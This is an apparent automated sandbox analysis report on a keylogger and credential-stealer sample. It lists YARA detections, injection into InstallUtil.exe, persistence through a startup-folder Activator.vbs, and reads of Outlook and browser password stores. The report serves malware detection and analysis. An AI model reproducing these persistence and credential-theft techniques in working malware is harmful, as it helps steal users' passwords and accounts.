Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Activator.exe.0.dr; String found in binary or memory: https://tools.ietf.org/html/rfc4253#section-4.2
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694

                    System Summary

                    Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060D76C0 NtResumeThread
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060D3890 NtProtectVirtualMemory
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060D76BA NtResumeThread
                    Source: C:\Users\user\AppData\Roaming\Activator.exe | Code function: 10_2_060D3888 NtProtectVirtualMemory
                    Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1245368848.0000000004F30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameThqvisca.dll" vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePO#50241.exe2 vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000000.1221849527.000000000065E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePO#50241.exe2 vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1233434010.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe | Binary or memory string: OriginalFilenamePO#50241.exe2 vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: TtLlwb3ava.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Activator.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"
Source: TtLlwb3ava.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TtLlwb3ava.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: InstallUtil.exe, 00000002.00000002.2472513262.0000000002653000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002645000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002635000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002674000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002668000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2474821330.000000000358D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003183000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003190000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003150000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); (this is the schema of the Chromium "Login Data" SQLite password database, carried by the injected InstallUtil.exe processes)
Source: TtLlwb3ava.exe | Virustotal: Detection: 72%
Source: TtLlwb3ava.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | File read: C:\Users\user\Desktop\TtLlwb3ava.exe
Source: unknown | Process created: C:\Users\user\Desktop\TtLlwb3ava.exe "C:\Users\user\Desktop\TtLlwb3ava.exe"
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\Activator.exe "C:\Users\user\AppData\Roaming\Activator.exe"
Source: C:\Users\user\AppData\Roaming\Activator.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\Activator.exe "C:\Users\user\AppData\Roaming\Activator.exe"
Source: C:\Users\user\AppData\Roaming\Activator.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, windows.storage.dll, ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (first listed instance) | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, dpapi.dll
Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Roaming\Activator.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (second listed instance) | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, dpapi.dll
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\TtLlwb3ava.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: TtLlwb3ava.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TtLlwb3ava.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: TtLlwb3ava.exe | Static file information: File size 1882112 > 1048576
Source: TtLlwb3ava.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1cae00
Source: TtLlwb3ava.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
